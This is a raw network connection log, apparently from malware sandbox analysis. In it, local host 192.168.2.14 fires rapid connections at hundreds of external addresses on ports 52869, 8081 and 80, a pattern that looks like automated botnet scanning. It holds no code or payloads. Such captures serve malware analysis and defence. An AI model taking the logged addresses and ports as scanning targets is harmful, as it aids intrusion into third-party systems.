                                                Jul 20, 2024 23:05:34.911091089 CEST5286936406172.51.35.214192.168.2.14
                                                Jul 20, 2024 23:05:34.911139965 CEST3640652869192.168.2.14172.51.35.214
                                                Jul 20, 2024 23:05:34.911211014 CEST8053770112.165.112.253192.168.2.14
                                                Jul 20, 2024 23:05:34.911274910 CEST498228081192.168.2.14150.141.140.247
                                                Jul 20, 2024 23:05:34.911309958 CEST5377080192.168.2.14112.165.112.253
                                                Jul 20, 2024 23:05:34.911823034 CEST80813467040.182.202.6192.168.2.14
                                                Jul 20, 2024 23:05:34.911923885 CEST5935452869192.168.2.14207.229.195.229
                                                Jul 20, 2024 23:05:34.912425041 CEST5794480192.168.2.14112.236.220.141
                                                Jul 20, 2024 23:05:34.912730932 CEST604228081192.168.2.1480.53.6.37
                                                Jul 20, 2024 23:05:34.912730932 CEST604228081192.168.2.1480.53.6.37
                                                Jul 20, 2024 23:05:34.913369894 CEST80813551040.182.202.6192.168.2.14
                                                Jul 20, 2024 23:05:34.913423061 CEST355108081192.168.2.1440.182.202.6
                                                Jul 20, 2024 23:05:34.913804054 CEST330168081192.168.2.1480.53.6.37
                                                Jul 20, 2024 23:05:34.914509058 CEST528694987417.150.249.106192.168.2.14
                                                Jul 20, 2024 23:05:34.914557934 CEST4987452869192.168.2.1417.150.249.106
                                                Jul 20, 2024 23:05:34.914880037 CEST808148990150.141.140.247192.168.2.14
                                                Jul 20, 2024 23:05:34.915117979 CEST5836452869192.168.2.1452.192.238.227
                                                Jul 20, 2024 23:05:34.915359020 CEST8056900112.236.220.141192.168.2.14
                                                Jul 20, 2024 23:05:34.915591955 CEST390888081192.168.2.14105.56.143.60
                                                Jul 20, 2024 23:05:34.915591955 CEST390888081192.168.2.14105.56.143.60
                                                Jul 20, 2024 23:05:34.915904045 CEST4183080192.168.2.14112.210.253.203
                                                Jul 20, 2024 23:05:34.915904045 CEST4183080192.168.2.14112.210.253.203
                                                Jul 20, 2024 23:05:34.916374922 CEST808149822150.141.140.247192.168.2.14
                                                Jul 20, 2024 23:05:34.916425943 CEST498228081192.168.2.14150.141.140.247
                                                Jul 20, 2024 23:05:34.917149067 CEST8054922112.157.87.162192.168.2.14
                                                Jul 20, 2024 23:05:34.917195082 CEST5286959354207.229.195.229192.168.2.14
                                                Jul 20, 2024 23:05:34.917196035 CEST399068081192.168.2.14105.56.143.60
                                                Jul 20, 2024 23:05:34.917229891 CEST5935452869192.168.2.14207.229.195.229
                                                Jul 20, 2024 23:05:34.917503119 CEST8057944112.236.220.141192.168.2.14
                                                Jul 20, 2024 23:05:34.917546988 CEST5794480192.168.2.14112.236.220.141
                                                Jul 20, 2024 23:05:34.918169022 CEST4706252869192.168.2.141.146.229.84
                                                Jul 20, 2024 23:05:34.918673038 CEST80816042280.53.6.37192.168.2.14
                                                Jul 20, 2024 23:05:34.918737888 CEST4287480192.168.2.14112.210.253.203
                                                Jul 20, 2024 23:05:34.919097900 CEST392668081192.168.2.14217.81.192.85
                                                Jul 20, 2024 23:05:34.919097900 CEST392668081192.168.2.14217.81.192.85
                                                Jul 20, 2024 23:05:34.919621944 CEST80813301680.53.6.37192.168.2.14
                                                Jul 20, 2024 23:05:34.919660091 CEST330168081192.168.2.1480.53.6.37
                                                Jul 20, 2024 23:05:34.920036077 CEST400788081192.168.2.14217.81.192.85
                                                Jul 20, 2024 23:05:34.920425892 CEST528695836452.192.238.227192.168.2.14
                                                Jul 20, 2024 23:05:34.920501947 CEST5836452869192.168.2.1452.192.238.227
                                                Jul 20, 2024 23:05:34.920773029 CEST808139088105.56.143.60192.168.2.14
                                                Jul 20, 2024 23:05:34.920892000 CEST8041830112.210.253.203192.168.2.14
                                                Jul 20, 2024 23:05:34.921719074 CEST4780252869192.168.2.1468.40.200.159
                                                Jul 20, 2024 23:05:34.922127962 CEST343428081192.168.2.1420.142.43.202
                                                Jul 20, 2024 23:05:34.922127962 CEST343428081192.168.2.1420.142.43.202
                                                Jul 20, 2024 23:05:34.922332048 CEST808139906105.56.143.60192.168.2.14
                                                Jul 20, 2024 23:05:34.922389030 CEST399068081192.168.2.14105.56.143.60
                                                Jul 20, 2024 23:05:34.922692060 CEST5319080192.168.2.14112.202.133.26
                                                Jul 20, 2024 23:05:34.922692060 CEST5319080192.168.2.14112.202.133.26
                                                Jul 20, 2024 23:05:34.923844099 CEST351468081192.168.2.1420.142.43.202
                                                Jul 20, 2024 23:05:34.923909903 CEST52869470621.146.229.84192.168.2.14
                                                Jul 20, 2024 23:05:34.924050093 CEST4706252869192.168.2.141.146.229.84
                                                Jul 20, 2024 23:05:34.924074888 CEST8042874112.210.253.203192.168.2.14
                                                Jul 20, 2024 23:05:34.924118996 CEST4287480192.168.2.14112.210.253.203
                                                Jul 20, 2024 23:05:34.924196959 CEST808139266217.81.192.85192.168.2.14
                                                Jul 20, 2024 23:05:34.924768925 CEST4453452869192.168.2.1423.55.138.59
                                                Jul 20, 2024 23:05:34.925133944 CEST808140078217.81.192.85192.168.2.14
                                                Jul 20, 2024 23:05:34.925189972 CEST400788081192.168.2.14217.81.192.85
                                                Jul 20, 2024 23:05:34.925506115 CEST5423480192.168.2.14112.202.133.26
                                                Jul 20, 2024 23:05:34.925937891 CEST398168081192.168.2.14197.141.202.147
                                                Jul 20, 2024 23:05:34.925937891 CEST398168081192.168.2.14197.141.202.147
                                                Jul 20, 2024 23:05:34.926803112 CEST406148081192.168.2.14197.141.202.147
                                                Jul 20, 2024 23:05:34.927264929 CEST528694780268.40.200.159192.168.2.14
                                                Jul 20, 2024 23:05:34.927314997 CEST4780252869192.168.2.1468.40.200.159
                                                Jul 20, 2024 23:05:34.927609921 CEST80813434220.142.43.202192.168.2.14
                                                Jul 20, 2024 23:05:34.927828074 CEST8053190112.202.133.26192.168.2.14
                                                Jul 20, 2024 23:05:34.928926945 CEST5650052869192.168.2.14218.210.113.18
                                                Jul 20, 2024 23:05:34.929434061 CEST433788081192.168.2.14139.177.45.56
                                                Jul 20, 2024 23:05:34.929434061 CEST433788081192.168.2.14139.177.45.56
                                                Jul 20, 2024 23:05:34.929838896 CEST5455280192.168.2.14112.175.130.75
                                                Jul 20, 2024 23:05:34.929838896 CEST5455280192.168.2.14112.175.130.75
                                                Jul 20, 2024 23:05:34.930008888 CEST80813514620.142.43.202192.168.2.14
                                                Jul 20, 2024 23:05:34.930088997 CEST351468081192.168.2.1420.142.43.202
                                                Jul 20, 2024 23:05:34.930480957 CEST528694453423.55.138.59192.168.2.14
                                                Jul 20, 2024 23:05:34.930551052 CEST4453452869192.168.2.1423.55.138.59
                                                Jul 20, 2024 23:05:34.930660963 CEST8054234112.202.133.26192.168.2.14
                                                Jul 20, 2024 23:05:34.930721998 CEST5423480192.168.2.14112.202.133.26
                                                Jul 20, 2024 23:05:34.931242943 CEST441688081192.168.2.14139.177.45.56
                                                Jul 20, 2024 23:05:34.931797028 CEST808139816197.141.202.147192.168.2.14
                                                Jul 20, 2024 23:05:34.932017088 CEST3667252869192.168.2.14211.88.161.89
                                                Jul 20, 2024 23:05:34.932143927 CEST808140614197.141.202.147192.168.2.14
                                                Jul 20, 2024 23:05:34.932188988 CEST406148081192.168.2.14197.141.202.147
                                                Jul 20, 2024 23:05:34.932712078 CEST5559880192.168.2.14112.175.130.75
                                                Jul 20, 2024 23:05:34.933064938 CEST808145968154.151.242.45192.168.2.14
                                                Jul 20, 2024 23:05:34.933094978 CEST508988081192.168.2.1482.45.53.166
                                                Jul 20, 2024 23:05:34.933094978 CEST508988081192.168.2.1482.45.53.166
                                                Jul 20, 2024 23:05:34.933912039 CEST5286956500218.210.113.18192.168.2.14
                                                Jul 20, 2024 23:05:34.933976889 CEST5650052869192.168.2.14218.210.113.18
                                                Jul 20, 2024 23:05:34.934076071 CEST516828081192.168.2.1482.45.53.166
                                                Jul 20, 2024 23:05:34.934362888 CEST808143378139.177.45.56192.168.2.14
                                                Jul 20, 2024 23:05:34.935007095 CEST8054552112.175.130.75192.168.2.14
                                                Jul 20, 2024 23:05:34.935334921 CEST6061652869192.168.2.14164.159.1.86
                                                Jul 20, 2024 23:05:34.935676098 CEST414088081192.168.2.1494.125.5.224
                                                Jul 20, 2024 23:05:34.935676098 CEST414088081192.168.2.1494.125.5.224
                                                Jul 20, 2024 23:05:34.936069965 CEST5132680192.168.2.14112.4.253.137
                                                Jul 20, 2024 23:05:34.936069965 CEST5132680192.168.2.14112.4.253.137
                                                Jul 20, 2024 23:05:34.937000990 CEST808144168139.177.45.56192.168.2.14
                                                Jul 20, 2024 23:05:34.937011003 CEST8046340112.127.110.129192.168.2.14
                                                Jul 20, 2024 23:05:34.937016964 CEST80815499647.23.180.85192.168.2.14
                                                Jul 20, 2024 23:05:34.937094927 CEST441688081192.168.2.14139.177.45.56
                                                Jul 20, 2024 23:05:34.937232018 CEST421848081192.168.2.1494.125.5.224
                                                Jul 20, 2024 23:05:34.937506914 CEST5286936672211.88.161.89192.168.2.14
                                                Jul 20, 2024 23:05:34.937552929 CEST3667252869192.168.2.14211.88.161.89
                                                Jul 20, 2024 23:05:34.937865019 CEST8055598112.175.130.75192.168.2.14
                                                Jul 20, 2024 23:05:34.937912941 CEST5559880192.168.2.14112.175.130.75
                                                Jul 20, 2024 23:05:34.938054085 CEST3365052869192.168.2.1437.213.85.230
                                                Jul 20, 2024 23:05:34.938146114 CEST80815089882.45.53.166192.168.2.14
                                                Jul 20, 2024 23:05:34.938689947 CEST5237480192.168.2.14112.4.253.137
                                                Jul 20, 2024 23:05:34.939249992 CEST391108081192.168.2.14203.226.166.55
                                                Jul 20, 2024 23:05:34.939249992 CEST391108081192.168.2.14203.226.166.55
                                                Jul 20, 2024 23:05:34.940068960 CEST80815168282.45.53.166192.168.2.14
                                                Jul 20, 2024 23:05:34.940119028 CEST516828081192.168.2.1482.45.53.166
                                                Jul 20, 2024 23:05:34.940211058 CEST398808081192.168.2.14203.226.166.55
                                                Jul 20, 2024 23:05:34.940606117 CEST5286960616164.159.1.86192.168.2.14
                                                Jul 20, 2024 23:05:34.940686941 CEST6061652869192.168.2.14164.159.1.86
                                                Jul 20, 2024 23:05:34.940758944 CEST80814140894.125.5.224192.168.2.14
                                                Jul 20, 2024 23:05:34.941019058 CEST8051326112.4.253.137192.168.2.14
                                                Jul 20, 2024 23:05:34.941024065 CEST80814706839.255.251.192192.168.2.14
                                                Jul 20, 2024 23:05:34.941627026 CEST5999052869192.168.2.14159.166.244.164
                                                Jul 20, 2024 23:05:34.942007065 CEST417448081192.168.2.1492.242.25.177
                                                Jul 20, 2024 23:05:34.942007065 CEST417448081192.168.2.1492.242.25.177
                                                Jul 20, 2024 23:05:34.942310095 CEST80814218494.125.5.224192.168.2.14
                                                Jul 20, 2024 23:05:34.942363024 CEST421848081192.168.2.1494.125.5.224
                                                Jul 20, 2024 23:05:34.942569017 CEST4887080192.168.2.14112.9.184.223
                                                Jul 20, 2024 23:05:34.942569017 CEST4887080192.168.2.14112.9.184.223
                                                Jul 20, 2024 23:05:34.943129063 CEST528693365037.213.85.230192.168.2.14
                                                Jul 20, 2024 23:05:34.943177938 CEST3365052869192.168.2.1437.213.85.230
                                                Jul 20, 2024 23:05:34.943746090 CEST425068081192.168.2.1492.242.25.177
                                                Jul 20, 2024 23:05:34.944370985 CEST8052374112.4.253.137192.168.2.14
                                                Jul 20, 2024 23:05:34.944386005 CEST3863252869192.168.2.14189.150.109.151
                                                Jul 20, 2024 23:05:34.944427013 CEST5237480192.168.2.14112.4.253.137
                                                Jul 20, 2024 23:05:34.944535017 CEST808139110203.226.166.55192.168.2.14
                                                Jul 20, 2024 23:05:34.944996119 CEST8052982112.134.182.255192.168.2.14
                                                Jul 20, 2024 23:05:34.945007086 CEST80816039657.242.101.56192.168.2.14
                                                Jul 20, 2024 23:05:34.945157051 CEST4992080192.168.2.14112.9.184.223
                                                Jul 20, 2024 23:05:34.945509911 CEST383208081192.168.2.14209.212.246.106
                                                Jul 20, 2024 23:05:34.945509911 CEST383208081192.168.2.14209.212.246.106
                                                Jul 20, 2024 23:05:34.945566893 CEST808139880203.226.166.55192.168.2.14
                                                Jul 20, 2024 23:05:34.945656061 CEST398808081192.168.2.14203.226.166.55
                                                Jul 20, 2024 23:05:34.946439981 CEST390768081192.168.2.14209.212.246.106
                                                Jul 20, 2024 23:05:34.946717024 CEST5286959990159.166.244.164192.168.2.14
                                                Jul 20, 2024 23:05:34.946758986 CEST5999052869192.168.2.14159.166.244.164
                                                Jul 20, 2024 23:05:34.947135925 CEST80814174492.242.25.177192.168.2.14
                                                Jul 20, 2024 23:05:34.947532892 CEST8048870112.9.184.223192.168.2.14
                                                Jul 20, 2024 23:05:34.947655916 CEST5377852869192.168.2.14106.223.167.59
                                                Jul 20, 2024 23:05:34.948241949 CEST586468081192.168.2.1463.226.83.22
                                                Jul 20, 2024 23:05:34.948241949 CEST586468081192.168.2.1463.226.83.22
                                                Jul 20, 2024 23:05:34.948596954 CEST4484080192.168.2.14112.120.190.128
                                                Jul 20, 2024 23:05:34.948596954 CEST4484080192.168.2.14112.120.190.128
                                                Jul 20, 2024 23:05:34.949021101 CEST80814250692.242.25.177192.168.2.14
                                                Jul 20, 2024 23:05:34.949078083 CEST425068081192.168.2.1492.242.25.177
                                                Jul 20, 2024 23:05:34.949906111 CEST2696652869192.168.2.14125.180.243.83
                                                Jul 20, 2024 23:05:34.949908018 CEST2696652869192.168.2.14116.197.2.184
                                                Jul 20, 2024 23:05:34.949908018 CEST2696652869192.168.2.1497.71.44.240
                                                Jul 20, 2024 23:05:34.949917078 CEST2696652869192.168.2.1425.203.5.43
                                                Jul 20, 2024 23:05:34.949918032 CEST2696652869192.168.2.1449.83.27.219
                                                Jul 20, 2024 23:05:34.949917078 CEST2696652869192.168.2.1447.104.234.54
                                                Jul 20, 2024 23:05:34.949918032 CEST2696652869192.168.2.14140.200.78.210
                                                Jul 20, 2024 23:05:34.949923038 CEST2696652869192.168.2.14204.164.229.194
                                                Jul 20, 2024 23:05:34.949923038 CEST2696652869192.168.2.14191.156.105.201
                                                Jul 20, 2024 23:05:34.949923038 CEST2696652869192.168.2.14185.87.153.101
                                                Jul 20, 2024 23:05:34.949923038 CEST2696652869192.168.2.1424.4.155.46
                                                Jul 20, 2024 23:05:34.949925900 CEST2696652869192.168.2.144.234.130.62
                                                Jul 20, 2024 23:05:34.949934959 CEST2696652869192.168.2.1492.177.97.112
                                                Jul 20, 2024 23:05:34.949934959 CEST2696652869192.168.2.1445.124.106.123
                                                Jul 20, 2024 23:05:34.949934959 CEST2696652869192.168.2.1447.26.143.30
                                                Jul 20, 2024 23:05:34.949961901 CEST8052728112.165.112.253192.168.2.14
                                                Jul 20, 2024 23:05:34.949965954 CEST80815657470.175.226.25192.168.2.14
                                                Jul 20, 2024 23:05:34.949970007 CEST808135356116.19.120.13192.168.2.14
                                                Jul 20, 2024 23:05:34.949974060 CEST5286938632189.150.109.151192.168.2.14
                                                Jul 20, 2024 23:05:34.950088024 CEST2696652869192.168.2.14122.165.176.151
                                                Jul 20, 2024 23:05:34.950088978 CEST2696652869192.168.2.1492.201.144.62
                                                Jul 20, 2024 23:05:34.950088978 CEST2696652869192.168.2.14176.44.128.80
                                                Jul 20, 2024 23:05:34.950088978 CEST2696652869192.168.2.14219.160.119.18
                                                Jul 20, 2024 23:05:34.950088978 CEST2696652869192.168.2.14191.244.73.243
                                                Jul 20, 2024 23:05:34.950088978 CEST2696652869192.168.2.1432.192.109.254
                                                Jul 20, 2024 23:05:34.950088978 CEST2696652869192.168.2.1497.213.55.119
                                                Jul 20, 2024 23:05:34.950088978 CEST2696652869192.168.2.1489.172.236.176
                                                Jul 20, 2024 23:05:34.950366020 CEST2696652869192.168.2.1477.83.231.0
                                                Jul 20, 2024 23:05:34.950366020 CEST2696652869192.168.2.1454.48.74.242
                                                Jul 20, 2024 23:05:34.950366020 CEST2696652869192.168.2.14161.126.18.243
                                                Jul 20, 2024 23:05:34.950366020 CEST2696652869192.168.2.14100.187.132.120
                                                Jul 20, 2024 23:05:34.950366020 CEST2696652869192.168.2.1491.121.169.191
                                                Jul 20, 2024 23:05:34.950366020 CEST2696652869192.168.2.14164.11.137.216
                                                Jul 20, 2024 23:05:34.950366020 CEST2696652869192.168.2.14183.253.82.115
                                                Jul 20, 2024 23:05:34.950366020 CEST2696652869192.168.2.1412.148.108.18
                                                Jul 20, 2024 23:05:34.950462103 CEST2696652869192.168.2.14119.238.64.83
                                                Jul 20, 2024 23:05:34.950462103 CEST2696652869192.168.2.1496.95.169.154
                                                Jul 20, 2024 23:05:34.950462103 CEST2696652869192.168.2.1493.126.173.161
                                                Jul 20, 2024 23:05:34.950462103 CEST2696652869192.168.2.1418.240.153.218
                                                Jul 20, 2024 23:05:34.950462103 CEST2696652869192.168.2.14200.224.172.161
                                                Jul 20, 2024 23:05:34.950462103 CEST2696652869192.168.2.14126.238.252.160
                                                Jul 20, 2024 23:05:34.950462103 CEST2696652869192.168.2.14223.214.5.89
                                                Jul 20, 2024 23:05:34.950462103 CEST2696652869192.168.2.14193.5.42.88
                                                Jul 20, 2024 23:05:34.950504065 CEST8049920112.9.184.223192.168.2.14
                                                Jul 20, 2024 23:05:34.950586081 CEST2696652869192.168.2.1462.189.116.240
                                                Jul 20, 2024 23:05:34.950586081 CEST2696652869192.168.2.14100.202.15.240
                                                Jul 20, 2024 23:05:34.950586081 CEST2696652869192.168.2.14159.176.16.130
                                                Jul 20, 2024 23:05:34.950586081 CEST2696652869192.168.2.1491.111.129.197
                                                Jul 20, 2024 23:05:34.950586081 CEST2696652869192.168.2.14213.189.106.94
                                                Jul 20, 2024 23:05:34.950586081 CEST2696652869192.168.2.1471.233.122.57
                                                Jul 20, 2024 23:05:34.950586081 CEST2696652869192.168.2.14175.146.247.15
                                                Jul 20, 2024 23:05:34.950586081 CEST2696652869192.168.2.1454.192.129.153
                                                Jul 20, 2024 23:05:34.950669050 CEST808138320209.212.246.106192.168.2.14
                                                Jul 20, 2024 23:05:34.950967073 CEST2696652869192.168.2.1480.50.203.132
                                                Jul 20, 2024 23:05:34.950967073 CEST2696652869192.168.2.14125.85.162.236
                                                Jul 20, 2024 23:05:34.950967073 CEST2696652869192.168.2.14161.222.69.144
                                                Jul 20, 2024 23:05:34.950967073 CEST2696652869192.168.2.1497.189.105.6
                                                Jul 20, 2024 23:05:34.950967073 CEST3863252869192.168.2.14189.150.109.151
                                                Jul 20, 2024 23:05:34.950967073 CEST2696652869192.168.2.14192.79.124.241
                                                Jul 20, 2024 23:05:34.950967073 CEST2696652869192.168.2.1438.198.246.87
                                                Jul 20, 2024 23:05:34.950967073 CEST2696652869192.168.2.1460.68.102.220
                                                Jul 20, 2024 23:05:34.951822996 CEST808139076209.212.246.106192.168.2.14
                                                Jul 20, 2024 23:05:34.952281952 CEST2696652869192.168.2.1475.119.92.151
                                                Jul 20, 2024 23:05:34.952281952 CEST2696652869192.168.2.14154.203.201.18
                                                Jul 20, 2024 23:05:34.952281952 CEST2696652869192.168.2.14179.191.229.197
                                                Jul 20, 2024 23:05:34.952281952 CEST2696652869192.168.2.1436.106.161.161
                                                Jul 20, 2024 23:05:34.952282906 CEST2696652869192.168.2.14101.65.28.197
                                                Jul 20, 2024 23:05:34.952282906 CEST2696652869192.168.2.14166.187.21.85
                                                Jul 20, 2024 23:05:34.952282906 CEST2696652869192.168.2.14157.171.149.72
                                                Jul 20, 2024 23:05:34.952860117 CEST2696652869192.168.2.1469.157.13.224
                                                Jul 20, 2024 23:05:34.952860117 CEST2696652869192.168.2.14136.196.140.175
                                                Jul 20, 2024 23:05:34.952860117 CEST2696652869192.168.2.1492.177.238.200
                                                Jul 20, 2024 23:05:34.952860117 CEST2696652869192.168.2.1450.3.84.134
                                                Jul 20, 2024 23:05:34.952860117 CEST2696652869192.168.2.14131.183.255.118
                                                Jul 20, 2024 23:05:34.952860117 CEST2696652869192.168.2.14204.155.193.18
                                                Jul 20, 2024 23:05:34.952860117 CEST2696652869192.168.2.14141.250.254.239
                                                Jul 20, 2024 23:05:34.952860117 CEST2696652869192.168.2.1468.68.58.116
                                                Jul 20, 2024 23:05:34.953018904 CEST5286953778106.223.167.59192.168.2.14
                                                Jul 20, 2024 23:05:34.953234911 CEST80813467040.182.202.6192.168.2.14
                                                Jul 20, 2024 23:05:34.953350067 CEST80815864663.226.83.22192.168.2.14
                                                Jul 20, 2024 23:05:34.953511000 CEST8044840112.120.190.128192.168.2.14
                                                Jul 20, 2024 23:05:34.953515053 CEST2696652869192.168.2.14114.248.97.56
                                                Jul 20, 2024 23:05:34.953516006 CEST2696652869192.168.2.14121.164.80.162
                                                Jul 20, 2024 23:05:34.953516006 CEST2696652869192.168.2.1459.44.23.42
                                                Jul 20, 2024 23:05:34.953516006 CEST2696652869192.168.2.1424.160.46.49
                                                Jul 20, 2024 23:05:34.953516006 CEST2696652869192.168.2.14152.153.83.132
                                                Jul 20, 2024 23:05:34.953516006 CEST2696652869192.168.2.1434.179.222.192
                                                Jul 20, 2024 23:05:34.953516006 CEST2696652869192.168.2.1412.251.167.176
                                                Jul 20, 2024 23:05:34.953516006 CEST2696652869192.168.2.14206.209.134.255
                                                Jul 20, 2024 23:05:34.954956055 CEST5286926966125.180.243.83192.168.2.14
                                                Jul 20, 2024 23:05:34.954994917 CEST2696652869192.168.2.1431.43.154.194
                                                Jul 20, 2024 23:05:34.954994917 CEST2696652869192.168.2.14106.241.87.67
                                                Jul 20, 2024 23:05:34.954994917 CEST2696652869192.168.2.1498.249.26.162
                                                Jul 20, 2024 23:05:34.954994917 CEST2696652869192.168.2.14200.65.225.77
                                                Jul 20, 2024 23:05:34.954994917 CEST2696652869192.168.2.1453.127.213.152
                                                Jul 20, 2024 23:05:34.954994917 CEST2696652869192.168.2.14217.104.148.40
                                                Jul 20, 2024 23:05:34.954994917 CEST2696652869192.168.2.1451.130.138.196
                                                Jul 20, 2024 23:05:34.954994917 CEST2696652869192.168.2.1448.151.66.255
                                                Jul 20, 2024 23:05:34.955245018 CEST528692696649.83.27.219192.168.2.14
                                                Jul 20, 2024 23:05:34.955349922 CEST5286926966204.164.229.194192.168.2.14
                                                Jul 20, 2024 23:05:34.955485106 CEST5286926966140.200.78.210192.168.2.14
                                                Jul 20, 2024 23:05:34.955488920 CEST52869269664.234.130.62192.168.2.14
                                                Jul 20, 2024 23:05:34.955589056 CEST528692696625.203.5.43192.168.2.14
                                                Jul 20, 2024 23:05:34.955593109 CEST5286926966119.238.64.83192.168.2.14
                                                Jul 20, 2024 23:05:34.955883026 CEST528692696677.83.231.0192.168.2.14
                                                Jul 20, 2024 23:05:34.955888033 CEST528692696647.104.234.54192.168.2.14
                                                Jul 20, 2024 23:05:34.955984116 CEST528692696654.48.74.242192.168.2.14
                                                Jul 20, 2024 23:05:34.955988884 CEST528692696662.189.116.240192.168.2.14
                                                Jul 20, 2024 23:05:34.956357956 CEST528692696680.50.203.132192.168.2.14
                                                Jul 20, 2024 23:05:34.956362963 CEST528692696696.95.169.154192.168.2.14
                                                Jul 20, 2024 23:05:34.956463099 CEST528692696692.177.97.112192.168.2.14
                                                Jul 20, 2024 23:05:34.956468105 CEST5286926966125.85.162.236192.168.2.14
                                                Jul 20, 2024 23:05:34.956896067 CEST5286926966191.156.105.201192.168.2.14
                                                Jul 20, 2024 23:05:34.956901073 CEST5286926966122.165.176.151192.168.2.14
                                                Jul 20, 2024 23:05:34.956921101 CEST5286926966116.197.2.184192.168.2.14
                                                Jul 20, 2024 23:05:34.956924915 CEST528692696645.124.106.123192.168.2.14
                                                Jul 20, 2024 23:05:34.956971884 CEST8056900112.236.220.141192.168.2.14
                                                Jul 20, 2024 23:05:34.956975937 CEST808148990150.141.140.247192.168.2.14
                                                Jul 20, 2024 23:05:34.957242966 CEST2696652869192.168.2.14206.167.163.90
                                                Jul 20, 2024 23:05:34.957242966 CEST2696652869192.168.2.14153.214.17.177
                                                Jul 20, 2024 23:05:34.957242966 CEST2696652869192.168.2.14163.148.202.115
                                                Jul 20, 2024 23:05:34.957243919 CEST2696652869192.168.2.1467.38.12.24
                                                Jul 20, 2024 23:05:34.957243919 CEST2696652869192.168.2.14157.254.149.171
                                                Jul 20, 2024 23:05:34.957243919 CEST2696652869192.168.2.1449.30.236.251
                                                Jul 20, 2024 23:05:34.957243919 CEST2696652869192.168.2.1465.34.121.12
                                                Jul 20, 2024 23:05:34.957243919 CEST2696652869192.168.2.14141.149.116.120
                                                Jul 20, 2024 23:05:34.957319021 CEST5286926966161.126.18.243192.168.2.14
                                                Jul 20, 2024 23:05:34.957324028 CEST528692696647.26.143.30192.168.2.14
                                                Jul 20, 2024 23:05:34.957391024 CEST5286926966100.202.15.240192.168.2.14
                                                Jul 20, 2024 23:05:34.957396030 CEST528692696693.126.173.161192.168.2.14
                                                Jul 20, 2024 23:05:34.957617044 CEST5286926966185.87.153.101192.168.2.14
                                                Jul 20, 2024 23:05:34.957648993 CEST528692696692.201.144.62192.168.2.14
                                                Jul 20, 2024 23:05:34.957762003 CEST2696652869192.168.2.1412.103.8.219
                                                Jul 20, 2024 23:05:34.957762003 CEST2696652869192.168.2.1487.25.55.60
                                                Jul 20, 2024 23:05:34.957762003 CEST2696652869192.168.2.145.238.81.248
                                                Jul 20, 2024 23:05:34.957762003 CEST2696652869192.168.2.14190.0.225.28
                                                Jul 20, 2024 23:05:34.957762003 CEST2696652869192.168.2.14106.152.34.222
                                                Jul 20, 2024 23:05:34.957762003 CEST2696652869192.168.2.1461.50.146.33
                                                Jul 20, 2024 23:05:34.957762003 CEST2696652869192.168.2.14110.4.207.154
                                                Jul 20, 2024 23:05:34.957762003 CEST2696652869192.168.2.1464.129.250.95
                                                Jul 20, 2024 23:05:34.957861900 CEST2696652869192.168.2.1478.197.124.123
                                                Jul 20, 2024 23:05:34.957861900 CEST2696652869192.168.2.14144.76.154.113
                                                Jul 20, 2024 23:05:34.957861900 CEST2696652869192.168.2.1439.183.105.121
                                                Jul 20, 2024 23:05:34.957861900 CEST2696652869192.168.2.1498.239.232.196
                                                Jul 20, 2024 23:05:34.957861900 CEST2696652869192.168.2.1459.16.3.2
                                                Jul 20, 2024 23:05:34.957861900 CEST2696652869192.168.2.14128.15.34.80
                                                Jul 20, 2024 23:05:34.957861900 CEST2696652869192.168.2.14204.228.34.103
                                                Jul 20, 2024 23:05:34.957861900 CEST2696652869192.168.2.14164.63.211.187
                                                Jul 20, 2024 23:05:34.957868099 CEST528692696697.71.44.240192.168.2.14
                                                Jul 20, 2024 23:05:34.957937002 CEST5286926966176.44.128.80192.168.2.14
                                                Jul 20, 2024 23:05:34.958082914 CEST528692696669.157.13.224192.168.2.14
                                                Jul 20, 2024 23:05:34.958087921 CEST5286926966161.222.69.144192.168.2.14
                                                Jul 20, 2024 23:05:34.958096981 CEST528692696618.240.153.218192.168.2.14
                                                Jul 20, 2024 23:05:34.958285093 CEST528692696624.4.155.46192.168.2.14
                                                Jul 20, 2024 23:05:34.958631039 CEST5286926966219.160.119.18192.168.2.14
                                                Jul 20, 2024 23:05:34.958636045 CEST5286926966114.248.97.56192.168.2.14
                                                Jul 20, 2024 23:05:34.958645105 CEST5286926966136.196.140.175192.168.2.14
                                                Jul 20, 2024 23:05:34.958883047 CEST5286926966100.187.132.120192.168.2.14
                                                Jul 20, 2024 23:05:34.959079981 CEST5286926966159.176.16.130192.168.2.14
                                                Jul 20, 2024 23:05:34.959214926 CEST5286926966191.244.73.243192.168.2.14
                                                Jul 20, 2024 23:05:34.959219933 CEST5286926966121.164.80.162192.168.2.14
                                                Jul 20, 2024 23:05:34.959278107 CEST528692696692.177.238.200192.168.2.14
                                                Jul 20, 2024 23:05:34.959568977 CEST528692696632.192.109.254192.168.2.14
                                                Jul 20, 2024 23:05:34.959573984 CEST528692696659.44.23.42192.168.2.14
                                                Jul 20, 2024 23:05:34.959682941 CEST528692696697.213.55.119192.168.2.14
                                                Jul 20, 2024 23:05:34.959749937 CEST528692696650.3.84.134192.168.2.14
                                                Jul 20, 2024 23:05:34.959810972 CEST528692696689.172.236.176192.168.2.14
                                                Jul 20, 2024 23:05:34.960172892 CEST5286926966131.183.255.118192.168.2.14
                                                Jul 20, 2024 23:05:34.960361958 CEST5286926966200.224.172.161192.168.2.14
                                                Jul 20, 2024 23:05:34.960366964 CEST5286926966204.155.193.18192.168.2.14
                                                Jul 20, 2024 23:05:34.960375071 CEST528692696697.189.105.6192.168.2.14
                                                Jul 20, 2024 23:05:34.960621119 CEST2696652869192.168.2.1486.88.84.85
                                                Jul 20, 2024 23:05:34.960621119 CEST2696652869192.168.2.14168.22.240.103
                                                Jul 20, 2024 23:05:34.960621119 CEST2696652869192.168.2.1462.112.120.41
                                                Jul 20, 2024 23:05:34.960621119 CEST2696652869192.168.2.14146.54.173.69
                                                Jul 20, 2024 23:05:34.960621119 CEST2696652869192.168.2.14114.38.170.24
                                                Jul 20, 2024 23:05:34.960621119 CEST2696652869192.168.2.1467.132.246.110
                                                Jul 20, 2024 23:05:34.960621119 CEST2696652869192.168.2.14187.211.186.240
                                                Jul 20, 2024 23:05:34.960621119 CEST2696652869192.168.2.14108.67.27.88
                                                Jul 20, 2024 23:05:34.960711956 CEST528692696691.111.129.197192.168.2.14
                                                Jul 20, 2024 23:05:34.960757971 CEST2696652869192.168.2.14139.117.217.229
                                                Jul 20, 2024 23:05:34.960757971 CEST2696652869192.168.2.1417.18.17.141
                                                Jul 20, 2024 23:05:34.960757971 CEST2696652869192.168.2.1487.103.117.210
                                                Jul 20, 2024 23:05:34.960757971 CEST2696652869192.168.2.1445.131.99.6
                                                Jul 20, 2024 23:05:34.960757971 CEST2696652869192.168.2.1438.103.25.108
